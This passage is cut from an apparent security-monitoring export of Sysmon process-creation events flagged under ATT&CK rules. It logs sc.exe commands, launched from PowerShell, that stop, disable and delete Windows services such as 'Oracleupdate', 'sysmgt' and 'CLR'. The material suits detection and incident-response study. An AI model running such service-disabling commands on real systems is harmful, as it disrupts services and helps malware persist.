12:51:58.940"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001073192e00}"",""processId"":""7516"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.866",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.919 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001085182e00} +ProcessId: 1240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.921477500Z"",""eventRecordID"":""3376"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.919\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001085182e00}\r\nProcessId: 1240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \\gm Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.919"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001085182e00}"",""processId"":""1240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\\gm Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.828",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.888 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00107a162e00} +ProcessId: 5356 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop sysmgt +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.890455000Z"",""eventRecordID"":""3374"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.888\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00107a162e00}\r\nProcessId: 5356\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:58.888"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00107a162e00}"",""processId"":""5356"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.780",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.851 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001020142e00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.853771100Z"",""eventRecordID"":""3371"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.851\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001020142e00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.851"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001020142e00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.749",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.824 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001079122e00} +ProcessId: 7424 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.826911800Z"",""eventRecordID"":""3369"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.824\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-001079122e00}\r\nProcessId: 7424\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.824"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-001079122e00}"",""processId"":""7424"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.736",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:58.813 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010b0112e00} +ProcessId: 8140 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.815242300Z"",""eventRecordID"":""3368"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.813\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-0010b0112e00}\r\nProcessId: 8140\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.813"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-0010b0112e00}"",""processId"":""8140"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:26.689",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:58.762 +ProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109e0e2e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:58.767660400Z"",""eventRecordID"":""3365"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:58.762\r\nProcessGuid: {df9fc3d3-b3ee-5ecf-0000-00109e0e2e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:58.762"",""processGuid"":""{df9fc3d3-b3ee-5ecf-0000-00109e0e2e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 